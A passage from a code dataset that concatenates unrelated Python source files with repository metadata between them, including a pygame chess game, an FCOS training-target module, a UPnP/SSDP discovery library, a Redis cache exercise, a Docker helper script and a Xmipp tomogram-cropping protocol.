tickss +=1
if tickss%60==0:
t2-=1
if t2 == 0:
gameover = True
text = font.render(str(t), True, (0,255,0))
textRect = text.get_rect()
textRect.center = (900, 0)
text2 = font.render(str(t2), True, (0,255,0))
textRect2 = text2.get_rect()
textRect2.center = (900, 800)
Name = font.render(str(n1), True, (255,255,255))
name = Name.get_rect()
name.center = (900, 100)
Name2 = font.render(str(n2), True, (255,255,255))
name2 = Name2.get_rect()
name2.center = (900, 700)
for i in range(len(whitelist)):
for j in range(len(redlist)):
if whiteturn == False:
if whitelist[i].row/100 == redlist[j].row/100 and whitelist[i].column/100 == redlist[j].column/100:
redlist[j].alive = False
print(redlist[j].type, "got killed")
if whiteturn == True:
if redlist[j].row/100 == whitelist[i].row/100 and redlist[j].column/100 == whitelist[i].column/100:
whitelist[i].alive = False
print(whitelist[i].type, "got killed")
if WhiteKing.alive == False:
checkmate = True
if RedKing.alive == False:
checkmate = True
# RENDER--------------------------------------------------------------------------------
screen.fill((0,0,0)) #wipe screen so it doesn't smear
screen.blit(background, (0,0))
if TurnNum % 2==0:
whiteturn=True
print("white's turn")
else:
print("red's turn")
whiteturn = False
print("Turn Num:", TurnNum)
#draws white pieces
for i in range(len(whitelist)):
whitelist[i].draw()
#draws red pieces
for i in range(len(redlist)):
redlist[i].draw()
screen.blit(Name, (900,50))
screen.blit(Name2, (900,700))
screen.blit(text, (900, 100))
screen.blit(text2, (900, 750))
pygame.display.flip()#this actually puts the pixel on the screen
#end game loop------------------------------------------------------------------------------
pygame.quit()
|
richfls/chess
|
main9.py
|
main9.py
|
py
| 11,852 |
python
|
en
|
code
| 0 |
github-code
|
6
|
16438405840
|
# -*- coding: utf-8 -*-
"""
# @file name : target.py
# @author : chenzhanpeng https://github.com/chenzpstar
# @date : 2022-01-09
# @brief : FCOS训练目标类
"""
import torch
import torch.nn as nn
from models.config import FCOSConfig
from models.utils import coords2centers, coords2offsets, decode_coords, reshape_feat
class FCOSTarget(nn.Module):
def __init__(self, cfg=None):
super(FCOSTarget, self).__init__()
if cfg is None:
self.cfg = FCOSConfig
else:
self.cfg = cfg
self.strides = self.cfg.strides
self.ranges = self.cfg.ranges
assert len(self.strides) == len(self.ranges)
def forward(self, feats, labels, boxes):
stages_num = len(self.strides)
assert len(feats) == stages_num
cls_targets = []
reg_targets = []
ctr_targets = []
for i in range(stages_num):
stage_targets = self._gen_stage_targets(
feats[i],
labels,
boxes,
self.strides[i],
self.ranges[i],
)
cls_targets.append(stage_targets[0])
reg_targets.append(stage_targets[1])
ctr_targets.append(stage_targets[2])
return cls_targets, reg_targets, ctr_targets
def _gen_stage_targets(self,
feat,
labels,
boxes,
stride,
range,
sample_radio=1.5):
coords = decode_coords(feat, stride).to(device=boxes.device)
feat = reshape_feat(feat) # bchw -> b(hw)c
batch_size, hw = feat.shape[:2] # b(hw)c
boxes_num = boxes.shape[1] # bnc
# 1.计算每个坐标到所有标注框四边的偏移量
offsets = coords2offsets(coords, boxes)
assert offsets.shape == (batch_size, hw, boxes_num, 4)
offsets_min = offsets.min(dim=-1)[0]
offsets_max = offsets.max(dim=-1)[0]
boxes_mask = offsets_min > 0
stage_mask = (offsets_max > range[0]) & (offsets_max <= range[1])
# 2.计算每个坐标到所有标注框中心的偏移量
ctr_offsets = coords2centers(coords, boxes)
assert ctr_offsets.shape == (batch_size, hw, boxes_num, 4)
radius = sample_radio * stride
ctr_offsets_max = ctr_offsets.max(dim=-1)[0]
ctr_mask = ctr_offsets_max <= radius
pos_mask = boxes_mask & stage_mask & ctr_mask
assert pos_mask.shape == (batch_size, hw, boxes_num)
# 3.计算所有标注框面积
areas = (offsets[..., 0] + offsets[..., 2]) * (offsets[..., 1] +
offsets[..., 3])
areas[~pos_mask] = 999999 # neg_areas
areas_min_idx = areas.min(dim=-1)[1].unsqueeze(dim=-1)
areas_min_mask = torch.zeros_like(areas, dtype=torch.bool).scatter(
-1, areas_min_idx, 1)
assert areas_min_mask.shape == (batch_size, hw, boxes_num)
# 4.计算分类目标
labels = torch.broadcast_tensors(
labels[:, None, :], areas.long())[0] # [b,1,n] -> [b,h*w,n]
cls_targets = labels[areas_min_mask].reshape((batch_size, -1, 1))
assert cls_targets.shape == (batch_size, hw, 1)
# 5.计算回归目标
offsets = offsets / stride
reg_targets = offsets[areas_min_mask].reshape((batch_size, -1, 4))
assert reg_targets.shape == (batch_size, hw, 4)
# 6.计算中心度目标
lr_min = torch.min(reg_targets[..., 0], reg_targets[..., 2])
lr_max = torch.max(reg_targets[..., 0], reg_targets[..., 2])
tb_min = torch.min(reg_targets[..., 1], reg_targets[..., 3])
tb_max = torch.max(reg_targets[..., 1], reg_targets[..., 3])
ctr_targets = ((lr_min * tb_min) /
(lr_max * tb_max).clamp(min=1e-10)).sqrt().unsqueeze(
dim=-1)
assert ctr_targets.shape == (batch_size, hw, 1)
# 7.处理负样本
pos_mask = pos_mask.long().sum(dim=-1)
pos_mask = pos_mask >= 1
assert pos_mask.shape == (batch_size, hw)
cls_targets[~pos_mask] = 0
reg_targets[~pos_mask] = -1
ctr_targets[~pos_mask] = -1
return cls_targets, reg_targets, ctr_targets
if __name__ == "__main__":
import torch
torch.manual_seed(0)
model = FCOSTarget()
preds = (
[torch.rand(2, 3, 2, 2)] * 5,
[torch.rand(2, 4, 2, 2)] * 5,
[torch.rand(2, 1, 2, 2)] * 5,
)
labels = torch.rand(2, 3)
boxes = torch.rand(2, 3, 4)
out = model(preds[0], labels, boxes)
[print(stage_out.shape) for branch_out in out for stage_out in branch_out]
|
ydlam/Fcos-main
|
models/target.py
|
target.py
|
py
| 4,816 |
python
|
en
|
code
| 0 |
github-code
|
6
|
32506946053
|
import fcntl
import logging
import socket
import struct
import urllib.request
from urllib.parse import urlparse
from xml.dom import minidom
from functools import wraps
import urllib.error
import xml
SIOCGIFINDEX = 0x8933 # Get interface index
logger = logging.getLogger(__name__)
class NotRetrievedError(Exception):
"""Custom exception for objects that have not been retrieved
Custom object not retrieved exception class. Raised whenever a certain
property for a device or service was not retrieved.
"""
pass
class NotAvailableError(Exception):
"""Custom exception for when a certain URL could not be retrieved
Custom element not retrieved exception class. Raised whenever a value
needed to be accessed could not be retrieved from the URL.
"""
pass
def parse_http_header(header, header_key):
"""Parse HTTP header value
Parse the value of a specific header from a RAW HTTP response.
:param header: String containing the RAW HTTP response and headers
:type header: str
:param header_key: The header name of which to extract a value from
:type header_key: str
:return: The value of the header
:rtype: str
"""
split_headers = header.split('\r\n')
for entry in split_headers:
header = entry.strip().split(':', 1)
if header[0].strip().lower() == header_key.strip().lower():
return ''.join(header[1::]).split()[0]
def make_http_request(url, data=None, headers=None):
"""Helper function for making HTTP requests
Helper function for making HTTP requests using urllib.
:param url: The URL to which a request should be made
:type url: str
:param data: Provide data for the request. Request method will be set to
POST if data is provided
:type data: str
:param headers: Provide headers to send with the request
:type headers: dict
:return: A urllib.Request.urlopen object
:rtype: urllib.Request.urlopen
"""
if not headers:
headers = {}
# If data is provided the request method will automatically be set to POST
# by urllib
request = urllib.request.Request(url, data=data, headers=headers)
return urllib.request.urlopen(request)
def _device_description_required(func):
"""Decorator for checking whether the device description is available on a
device.
"""
@wraps(func)
def wrapper(device, *args, **kwargs):
if device.description is None:
raise NotRetrievedError(
'No device description retrieved for this device.')
elif device.description == NotAvailableError:
return
return func(device, *args, **kwargs)
return wrapper
def _get_if_index(ifname, fd):
"""Get the index corresponding to interface ifname used by socket fd"""
ifreq = struct.pack('16si', ifname.encode(), 0)
res = fcntl.ioctl(fd, SIOCGIFINDEX, ifreq)
return int(struct.unpack('16si', res)[1])
class SSDPDevice:
"""Represents an SSDP device
Object for representing an SSDP device.
:param address: SSDP device address
:type address: tuple
:param response: Device discovery response data
:type response: str
"""
def __init__(self, address, response):
self.address = address
self.host = address[0]
self.port = address[1]
self.response = response
self.description = None
self.friendly_name = None
self.type_ = None
self.base_url = None
self._get_description_request(parse_http_header(response, 'Location'))
self._get_friendly_name_request()
self._get_type_request()
self._get_base_url_request()
def get_friendly_name(self):
"""Get the friendly name for the device
Gets the device's friendly name
:return: Friendly name of the device
:rtype: str
"""
return self.friendly_name
def _get_description_request(self, url):
try:
device_description = make_http_request(url).read()
self.description = device_description
return device_description.decode()
except (urllib.error.HTTPError, urllib.error.URLError):
self.description = NotAvailableError
return None
@_device_description_required
def _get_friendly_name_request(self):
root = minidom.parseString(self.description)
device_friendly_name = root.getElementsByTagName(
'friendlyName')[0].firstChild.nodeValue
self.friendly_name = device_friendly_name
return self.friendly_name
@_device_description_required
def _get_type_request(self):
root = minidom.parseString(self.description)
device_type = root.getElementsByTagName(
'deviceType')[0].firstChild.nodeValue
self.type_ = device_type
return self.type_
@_device_description_required
def _get_base_url_request(self):
location_header_value = parse_http_header(self.response, 'Location')
header_url = urlparse(location_header_value)
root = minidom.parseString(self.description)
try:
parsed_url = urlparse(
root.getElementsByTagName('URLBase')[0].firstChild.nodeValue)
if parsed_url.port is not None:
base_url = '{}://{}'.format(parsed_url.scheme,
parsed_url.netloc)
else:
base_url = '{}://{}:{}'.format(parsed_url.scheme,
parsed_url.netloc,
header_url.port)
except (IndexError, AttributeError):
base_url = '{}://{}'.format(header_url.scheme, header_url.netloc)
self.base_url = base_url
return base_url
class SSDPHeader:
def __init__(self, **headers):
"""
Example M-SEARCH header:
------------------------------------------------------------------------
M-SEARCH * HTTP/1.1 SSDP method for search requests
HOST: 239.255.255.250:1900 SSDP multicast address and port (REQUIRED)
MAN: "ssdp:discover" HTTP Extension Framework scope (REQUIRED)
MX: 2 Maximum wait time in seconds (REQUIRED)
ST: upnp:rootdevice Search target (REQUIRED)
------------------------------------------------------------------------
"""
self.headers = {}
self.set_headers(**headers)
self._available_methods = ['M-SEARCH']
self.method = None
self.host = self.headers.get('HOST')
self.man = self.headers.get('MAN')
self.mx = self.headers.get('MX')
self.st = self.headers.get('ST')
def _check_method_required_params(self):
if self.method == 'M-SEARCH':
# M-SEARCH required parameters: HOST, MAN, MX, ST
if None in [self.host, self.man, self.mx, self.st]:
raise ValueError(
'M-SEARCH method requires HOST, MAN, MX and ST headers '
'to be set.')
def set_method(self, method):
method = method.upper()
if method in self._available_methods:
self.method = method.upper()
else:
raise ValueError('Method must be either' +
' or '.join(self._available_methods))
def set_header(self, name, value):
self.headers[name.upper()] = value
def set_headers(self, **headers):
for key, value in headers.items():
self.set_header(key.upper(), value)
class SSDPRequest(SSDPHeader):
"""Create and perform an SSDP request
:param method: SSDP request method [M-SEARCH]
"""
def __init__(self,
ssdp_mcast_addr='239.255.255.250',
ssdp_port=1900,
src_port=None,
interface=None,
**headers):
super().__init__(**headers)
self.SSDP_MCAST_ADDR = ssdp_mcast_addr
self.SSDP_PORT = ssdp_port
self.set_header('HOST', "{}:{}".format(self.SSDP_MCAST_ADDR,
self.SSDP_PORT))
self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
if (src_port is not None):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(('', src_port))
if (interface is not None):
try:
ifindex = _get_if_index(interface, self.socket.fileno())
except OSError:
logger.error(
"Could not find interface \"{}\"".format(interface))
return
except ValueError:
logger.error(
"Failed to parse the index of interface \"{}\"".format(
interface))
return
ip_mreqn = struct.pack(
'4s4si',
socket.inet_aton(ssdp_mcast_addr),
socket.inet_aton('0.0.0.0'), # INADDR_ANY
ifindex)
self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_IF,
ip_mreqn)
def __del__(self):
self.socket.close()
def m_search(self, discover_delay=2, st='ssdp:all', **headers):
"""Perform an M-SEARCH SSDP request
Send an SSDP M-SEARCH request for finding UPnP devices on the network.
:param discover_delay: Device discovery delay in seconds
:type discover_delay: int
:param st: Specify device Search Target
:type st: str
:param headers: Specify M-SEARCH specific headers
:type headers: str
:return: List of device that replied
:rtype: list
"""
self.set_method('M-SEARCH')
self.set_header('MAN', '"ssdp:discover"')
self.set_header('MX', discover_delay)
self.set_header('ST', st)
self.set_headers(**headers)
self.socket.settimeout(discover_delay)
devices = self._send_request(self._get_raw_request())
for device in devices:
yield device
def _get_raw_request(self):
"""Get raw request data to send to server"""
final_request_data = ''
if self.method is not None:
ssdp_start_line = '{} * HTTP/1.1'.format(self.method)
else:
ssdp_start_line = 'HTTP/1.1 200 OK'
final_request_data += '{}\r\n'.format(ssdp_start_line)
for header, value in self.headers.items():
final_request_data += '{}: {}\r\n'.format(header, value)
final_request_data += '\r\n'
return final_request_data
def _send_request(self, message):
self.socket.sendto(message.encode(),
(self.SSDP_MCAST_ADDR, self.SSDP_PORT))
devices = []
try:
while True:
# UDP packet data limit is 65507 imposed by IPv4
# https://en.wikipedia.org/wiki/User_Datagram_Protocol#Packet_structure
response, addr = self.socket.recvfrom(65507)
try:
device = SSDPDevice(addr, response.decode())
except xml.parsers.expat.ExpatError:
continue
devices.append(device)
except socket.timeout:
pass
return devices
class UPnP:
"""UPnP object
A UPnP object used for device discovery
"""
def __init__(self, src_port=None, interface=None):
self.ssdp = SSDPRequest(src_port=src_port, interface=interface)
self.discovered_devices = []
def discover(self, delay=2, **headers):
"""Find UPnP devices on the network
Find available UPnP devices on the network by sending an M-SEARCH
request.
:param delay: Discovery delay, amount of time in seconds to wait for a
reply from devices
:type delay: int
:param headers: Optional headers for the request
:return: List of discovered devices
:rtype: list
"""
discovered_devices = []
for device in self.ssdp.m_search(discover_delay=delay,
st='upnp:rootdevice',
**headers):
discovered_devices.append(device)
self.discovered_devices = discovered_devices
return self.discovered_devices
|
Blockstream/satellite
|
blocksatcli/upnp.py
|
upnp.py
|
py
| 12,542 |
python
|
en
|
code
| 949 |
github-code
|
6
|
71578007227
|
import h5py
import os
from torch.utils.data import Dataset
from DVS_dataload.my_transforms import *
from PIL import Image
import torch
import numpy as np
class DVSGestureDataset(Dataset):
def __init__(self, root, train=True, transform=None):
super(DVSGestureDataset, self).__init__()
self.n = 0
self.root = root
self.train = train
self.transform = transform
if train:
root_train = os.path.join(self.root, 'DvsGesture_train_40step_downsample')
for _, _, self.files_train in os.walk(root_train):
pass
self.n = len(self.files_train)
else:
root_test = os.path.join(self.root, 'DvsGesture_test_40step_downsample')
for _, _, self.files_test in os.walk(root_test):
pass
self.n = len(self.files_test)
def __len__(self):
return self.n
def __getitem__(self, idx):
if self.train:
root_test = os.path.join(self.root, 'DvsGesture_train_40step_downsample')
with h5py.File(root_test + os.sep + self.files_train[idx], 'r', swmr=True, libver="latest") as f:
target = f['label'][()]
data = f['data'][()]
if self.transform is not None:
data = self.transform(data)
return data, target
else:
root_test = os.path.join(self.root, 'DvsGesture_test_40step_downsample')
with h5py.File(root_test + os.sep + self.files_test[idx], 'r', swmr=True, libver="latest") as f:
target = f['label'][()]
data = f['data'][()]
if self.transform is not None:
data = self.transform(data)
return data, target
|
langfengQ/MLF-DSResNet
|
DVS_dataload/DVS_Gesture_dataset.py
|
DVS_Gesture_dataset.py
|
py
| 1,762 |
python
|
en
|
code
| 8 |
github-code
|
6
|
11726066534
|
# creates the finale report
import sys
import os
import glob
CL_HOME = os.environ['CL_HOME']
obj_folder = CL_HOME + "/testFinale"
las_f = obj_folder + "/finale_las.tsv"
mlas_f = obj_folder + "/finale_mlas.tsv"
blex_f = obj_folder + "/finale_blex.tsv"
ltcode2results = {}
for out_file in glob.glob(obj_folder+"/out_*"):
fname = out_file.split("/")[-1]
ltcode = fname[fname.find('_')+1:fname.rfind('_')]
las_score, mlas_score, blex_score = None, None, None
with open(out_file, 'r') as f:
for line in f:
line = line.strip()
if line.startswith("LAS F1"):
las_score = line
if line.startswith("MLAS"):
mlas_score = line
if line.startswith("BLEX"):
blex_score = line
if las_score and mlas_score and blex_score:
if ltcode not in ltcode2results:
ltcode2results[ltcode] = {}
if fname.endswith('udtags'):
ltcode2results[ltcode]['udpipe'] = {}
for name, score in [('las', las_score), ('mlas', mlas_score), ('blex', blex_score)]:
ltcode2results[ltcode]['udpipe'][name] = score.split()[3] if name == 'las' else score.split()[2]
ltcode2results[ltcode]['elmolex-udtags'] = {}
for name, score in [('las', las_score), ('mlas', mlas_score), ('blex', blex_score)]:
ltcode2results[ltcode]['elmolex-udtags'][name] = score.split()[5] if name == 'las' else score.split()[4]
if fname.endswith('bentags'):
ltcode2results[ltcode]['elmolex-bentags'] = {}
for name, score in [('las', las_score), ('mlas', mlas_score), ('blex', blex_score)]:
ltcode2results[ltcode]['elmolex-bentags'][name] = score.split()[5] if name == 'las' else score.split()[4]
def get_map(mp, fst, scnd):
if fst in mp:
if scnd in mp[fst]:
return mp[fst][scnd]
return 'None'
las_w = open(las_f, 'w')
mlas_w = open(mlas_f, 'w')
blex_w = open(blex_f, 'w')
header = 'tb\tudpipe\telmolex-udtags\telmolex-bentags\n'
las_w.write(header)
mlas_w.write(header)
blex_w.write(header)
for ltcode in sorted(ltcode2results):
for name, w in [('las', las_w), ('mlas', mlas_w), ('blex', blex_w)]:
udpipe = get_map(ltcode2results[ltcode], 'udpipe', name)
udtags = get_map(ltcode2results[ltcode], 'elmolex-udtags', name)
bentags = get_map(ltcode2results[ltcode], 'elmolex-bentags', name)
w.write(ltcode+"\t"+udpipe+"\t"+udtags+"\t"+bentags+"\n")
las_w.close()
mlas_w.close()
blex_w.close()
print('las, mlas and blex results respecitvely can be fetched from the following files:')
print(las_f)
print(mlas_f)
print(blex_f)
|
ganeshjawahar/ELMoLex
|
conll18/py/createFinaleReport.py
|
createFinaleReport.py
|
py
| 2,523 |
python
|
en
|
code
| 12 |
github-code
|
6
|
32552302191
|
import threading
import wikipedia
from kivy.clock import mainthread
from kivymd.app import MDApp
class MainApp(MDApp):
url = ""
def build(self):
self.title = "Wikipedia-App"
@mainthread
def search(self, text):
t1 = threading.Thread(target=self.get_wiki, args=(text,), daemon=True)
t1.start()
def get_wiki(self, text):
self.root.ids.rc_spin.active = True
self.root.ids.summary.text = ""
self.root.ids.title.text = ""
wikipedia.set_lang("en")
try:
summary = wikipedia.page(text.strip())
self.root.ids.title.text = summary.title
self.root.ids.summary.text = f"\n{summary.summary}"
except Exception as e:
print(e)
self.root.ids.title.text = (
"[color=#EE4B2B]"
+ "Sorry unable to find "
+ self.root.ids.fld.text
+ "[/color]"
)
self.root.ids.rc_spin.active = False
if __name__ == "__main__":
MainApp().run()
|
Kulothungan16/Example-Kivy-Apps
|
WikiPedia/main.py
|
main.py
|
py
| 1,052 |
python
|
en
|
code
| 42 |
github-code
|
6
|
28382691901
|
from .api import genshindb as gdb
def calc_talent_cost(name, current_level, to_level):
"""
Calculate talent cost.
:param name: character name
:param current_level: current level
:param to_level: to level
:return: talent cost dict
"""
if current_level >= to_level:
return None
json_data = gdb.get_tdata_by_cname(name)["costs"]
talent_cost = {}
for level in range(current_level + 1, to_level + 1):
for cost in json_data[f"lvl{level}"]:
name = cost["name"]
count = cost["count"]
if name not in talent_cost:
talent_cost[name] = 0
talent_cost[name] += count
return talent_cost
|
waigoma/genshin-charatraining-supporter
|
src/cgi-bin/genshin/talent_calculator.py
|
talent_calculator.py
|
py
| 704 |
python
|
en
|
code
| 0 |
github-code
|
6
|
70075665148
|
#!/usr/bin/env python3
"""
Cache class. In the __init__ method, store an instance of the Redis }
client as a private variable named _redis (using redis.Redis()) and
flush the instance using flushdb.
"""
import redis
from typing import Union, Optional, Callable
from uuid import uuid4
from functools import wraps
def count_calls(method: Callable) -> Callable:
"""
count how many times the function was called
"""
key = method.__qualname__
@wraps(method)
def wrapper(self, *args, **kwargs):
""" Wrapper for decorator functionality """
self._redis.incr(key)
return method(self, *args, **kwargs)
return wrapper
def call_history(method: Callable) -> Callable:
"""
store the history of inputs and outputs for a particular function.
"""
inputs = '{}:inputs'.format(method.__qualname__)
outputs = '{}:outputs'.format(method.__qualname__)
@wraps(method)
def wrapper(self, *args, **kwds):
"""wrapper function"""
self._redis.rpush(inputs, str(args))
output = method(self, *args, **kwds)
self._redis.rpush(outputs, output)
return output
return wrapper
def replay(methodName: Callable) -> None:
"""
Display the history of calls of a function
"""
_redis = redis.Redis()
try:
calls = _redis.get(methodName.__qualname__).decode('utf-8')
except Exception:
calls = 0
print(f'{methodName.__qualname__} was called {calls} times:')
inputs = _redis.lrange(methodName.__qualname__ + ':inputs', 0, -1)
outputs = _redis.lrange(methodName.__qualname__ + ':outputs', 0, -1)
for input, output in zip(inputs, outputs):
print('{}(*{}) -> {}'.format(methodName.__qualname__,
input.decode('utf-8'),
output.decode('utf-8')))
class Cache():
"""
Main class for cache
"""
def __init__(self):
""" CONSTRUCTOR"""
self._redis = redis.Redis()
self._redis.flushdb()
@call_history
@count_calls
def store(self, data: Union[str, bytes, int, float]) -> str:
"""
Takes a data as argumen a store in a REDIS db
Remember that data can be a str, bytes, int or float.
Returns: A key in string format
"""
_randomkey = uuid4().__str__()
self._redis.set(_randomkey, data)
return _randomkey
def get(self, key: str,
fn: Optional[Callable] = None) -> Union[str, bytes, int, float]:
""" Get the values as specific func"""
data = self._redis.get(key)
if fn:
return fn(data)
return data
def get_int(self, data: int) -> int:
""" Get the values as int" """
try:
int(data)
return data
except Exception:
return 0
def get_str(self, data: str) -> str:
""" Get the values as str"""
return self._redis.get(data).decode('utf_8')
|
lemejiamo/holbertonschool-backend-storage
|
0x02-redis_basic/exercise.py
|
exercise.py
|
py
| 3,014 |
python
|
en
|
code
| 1 |
github-code
|
6
|
41011803429
|
from os import system
def img():
if x==1:
y=input("enter the name of img")
z=input("u want version y/n if n it will take latest").lower()
if z=='y':
a=input("enter the version eg 0.2")
system(f"docker pull {y}:{a}")
else:
system(f"docker pull {y}")
def seeimg():
system(f"docker image ls")
def seecon():
print("all the containers")
system("docker ps -a")
print("all the running container")
system("docker ps")
def attach():
name=input("enter the name of docker")
system(f"docker restart {name}")
z=input("u want to attach to docker y/n")
if z=='y':
system(f"docker attach {name}")
def rmimg():
seeimg()
name=input()
system(f"docker image rm -f {name}")
def rmcon():
seecon()
name=input()
system(f"docker container rm -f {name}")
("\t\t\tWelcome to docker automation")
system("systemctl start docker")
while True:
print("""\t\t\tpress 1 to pull img
\t\t\tpress 2 to run docker
\t\t\tpress 3 to make your own img
\t\t\tpress 4 to make your own network
\t\t\tpress 5 to make your own permanent storage
\t\t\tpress 6 to see img
\t\t\tpress 7 to see container
\t\t\tpress 8 to remove container
\t\t\tpress 9 to remove img
\t\t\tpress 10 to exit
\t\t\tpress 11 to attach
\t\t\tpress 12 to remove network
\t\t\tpress 13 to remove storage""")
x=int(input())
if x==1:
img()
elif x==2:
k=""
print("the img u have")
p=system("docker image ls")
print(p)
z=input("enter image name:version")
p="null"
p=system(f"docker image ls|grep {z}")
if p!=z:
img()
i=input("u want to run on back y/n ").lower()
if i=='y':
k=k+" -d "
i=input("u want to add name y/n ").lower()
if i=='y':
name=input("enter the new name")
k=k+" --name "+name
i=input("u want to add network y/n").lower()
if i=='y':
name=input("enter the name of network")
k=k+" --network "+name
i=input("u want to add volume y/n").lower()
if i=='y':
name=input("enter the name of volume or directory")
name1=input("enter the directory where u want to copy")
k=k+" --v "+name+":"+" "+name1
k=k+" "+z
system(f"docker run -it{k}")
elif x==3:
name=input("enter name or id of the container")
name1=input("name of the img")
system(f"docker commit {name} {name1}")
elif x==4:
name=input("enter a new network name")
name1=input("name of driver host null bridge")
if name1=="host" or name1=="null":
print("plz remove first there must be one ")
else:
system(f"docker network create --driver {name1} name")
elif x==5:
name=input("enter a new voltage name")
system(f"docker volume create {name}")
elif x==6:
seeimg()
elif x==7:
seecon()
elif x==8:
rmcon()
elif x==9:
rmimg()
elif x==10:
break
system.exit(0)
elif x==11:
attach()
elif x==12:
name=input("enter the network name")
system(f"docker network rm -f {name}")
elif x==13:
name=input("enter the volume name")
system(f"docker volume rm -f {name}")
|
chirag248/Docker
|
doc.py
|
doc.py
|
py
| 3,536 |
python
|
en
|
code
| 0 |
github-code
|
6
|
41184065609
|
THEME_COLOR = "#375362"
FONT=("Arial",15,"italic")
from tkinter import *
from quiz_brain import QuizBrain
class Quizinterface:
def __init__(self,quizbrain:QuizBrain):
self.window= Tk()
self.score=0
self.quiz=quizbrain
#label Score
self.set()
self.label=Label(text=f"Score: {self.score}",bg=THEME_COLOR,fg="white",pady=20)
self.label.grid(row=0,column=1)
# Refresh
# self.refresh_image=PhotoImage(file="images/rename.png")
self.refresh=Button(highlightthickness=0,text="Refresh",command=self.refresh_operations)
self.refresh.grid(row=0,column=0)
#Canvas
self.canvas = Canvas(width="300", height="250", highlightthickness=0,bg="white")
self.question_text=self.canvas.create_text(150,125,text="Some text",fill=THEME_COLOR,
font=FONT,width=200)
self.canvas.grid(row=1, column=0, columnspan=2,pady=50)
#Button tick and cross
self.tick_image = PhotoImage(file="images/true.png")
self.correct = Button(image=self.tick_image, highlightthickness=0,command=self.trueAnswered)
self.correct.grid(column=0, row=2,pady=50)
cross_image = PhotoImage(file="images/false.png")
self.wrong = Button(image=cross_image, highlightthickness=0,command=self.falseAnswered)
self.wrong.grid(row=2, column=1,pady=50)
self.get_next()
self.window.mainloop()
def set(self):
self.window.title("Quiz App")
self.window.config(bg=THEME_COLOR,padx=20, pady=20)
def get_next(self):
if self.quiz.still_has_questions():
self.canvas.config(bg="white")
self.qtext=self.quiz.next_question()
self.canvas.itemconfig(self.question_text,text=self.qtext)
def falseAnswered(self):
is_right = self.quiz.check_answer("false")
print(is_right)
self.feedback(is_right)
#self.get_next()
def trueAnswered(self):
is_right=self.quiz.check_answer("True")
print(is_right)
self.feedback(is_right)
# def check(self,is_right):
# if is_right==True:
# self.score+=1
# print(self.score)
#
# self.feedback()
# else:
# self.feedback(False)
def feedback(self,is_right):
if is_right:
self.canvas.config(bg="green")
self.label.config(text=f"Score: {self.quiz.score}")
else:
self.canvas.config(bg="red")
self.window.after(1000,self.get_next)
def refresh_operations(self):
self.quiz.ref()
self.label.config(text=f"Score:{self.quiz.score}")
|
sshanbhag09/PythonBootcamp-
|
PycharmProjects/Day34FurtherChanged/ui.py
|
ui.py
|
py
| 2,730 |
python
|
en
|
code
| 0 |
github-code
|
6
|
17534123607
|
class Programmer:
"""
"""
def __init__(self, name: str, language: str, skills: int):
self.name = name
self.language = language
self.skills = skills
def watch_course(self, course_name, language, skills_earned) -> str:
"""
check if player knows the language, so they can
watch the course
:param course_name:
:param language:
:param skills_earned:
:return:
"""
if language == self.language:
self.skills += skills_earned
return f'{self.name} watched {course_name}'
return f'{self.name} does not know {language}'
def change_language(self, new_language, skills_needed):
if new_language == self.language:
return f'{self.name} already knows {new_language}'
if skills_needed > self.skills:
return f'{self.name} needs {skills_needed - self.skills} more skills'
old_language, self.language = self.language, new_language
self.skills = 0
return f'{self.name} switched from {old_language} to {new_language}'
programmer = Programmer("John", "Java", 50)
print(programmer.watch_course("Python Masterclass", "Python", 84))
print(programmer.change_language("Java", 30))
print(programmer.change_language("Python", 100))
print(programmer.watch_course("Java: zero to hero", "Java", 50))
print(programmer.change_language("Python", 100))
print(programmer.watch_course("Python Masterclass", "Python", 84))
|
emilynaydenova/SoftUni-Python-Web-Development
|
Python-OOP-Oct2023/Exercises/01.First Steps in OOP/07.Programmer.py
|
07.Programmer.py
|
py
| 1,498 |
python
|
en
|
code
| 0 |
github-code
|
6
|
44592268706
|
# **************************************************************************
# *
# * Authors: J.L. Vilas ([email protected]) [1]
# *
# * [1] Centro Nacional de Biotecnologia, CSIC, Spain
# *
# * This program is free software; you can redistribute it and/or modify
# * it under the terms of the GNU General Public License as published by
# * the Free Software Foundation; either version 2 of the License, or
# * (at your option) any later version.
# *
# * This program is distributed in the hope that it will be useful,
# * but WITHOUT ANY WARRANTY; without even the implied warranty of
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# * GNU General Public License for more details.
# *
# * You should have received a copy of the GNU General Public License
# * along with this program; if not, write to the Free Software
# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA
# * 02111-1307 USA
# *
# * All comments concerning this program package may be sent to the
# * e-mail address '[email protected]'
# *
# *********************************************************************
from pyworkflow import BETA
from pyworkflow.protocol.params import PointerParam
from tomo.objects import Tomogram
import os
from pyworkflow.object import Set
from xmipptomo.protocols.protocol_crop_resize_base import XmippProtCropBase3D
SUFIXCROPPED = '_cropped.mrc'
class XmippProtCropTomograms(XmippProtCropBase3D):
"""
Protocol to crop tomograms using xmipp_transform_window.
The protocol allows to change the size of a tomogram/s, by removing the
borders defined by the users
"""
_label = 'crop tomograms'
_devStatus = BETA
# --------------------------- DEFINE param functions ------------------------
def _defineParams(self, form):
form.addSection(label='Input')
form.addParam('inputSet',
PointerParam,
pointerClass='SetOfTomograms',
important=True,
label='Input set of tomograms',
help='Select a set of tomograms to be cropped.')
self._defineParamsReSize2D(form)
self._defineParamsReSize3D(form)
# --------------------------- INSERT steps functions ------------------------
def _insertAllSteps(self):
for tomo in self.inputSet.get():
self._insertFunctionStep(self.cropTomogramsStep, self.inputSet.get(), tomo.getObjId())
self._insertFunctionStep('closeStreamStep')
# --------------------------- STEP functions --------------------------------
def cropTomogramsStep(self, tomoSet, tomId):
'''
This function resize the tomograms by means of xmipp_transform_window.
The output is create in pseudo-streaming. pseudo because the input is
not open, but the output is updated during the execution of the protocol
'''
ts = self.inputSet.get()[tomId]
tsId = ts.getTsId()
outputPath = self._getExtraPath(str(tsId))
# Defining the output folder
os.mkdir(outputPath)
inputTomo = tomoSet[tomId].getFileName()
outputTomo = self.outputTomoFileName(outputPath, tsId, SUFIXCROPPED)
# Launching the xmipp command
params = ' -i %s ' % inputTomo
params += ' -o %s ' % outputTomo
params += ' --corners %i %i %i %i %i %i ' %(self.xcrop0.get(), self.ycrop0.get(),
self.zcrop0.get(), self.xcropF.get(),
self.ycropF.get(), self.zcropF.get())
params += ' --physical'
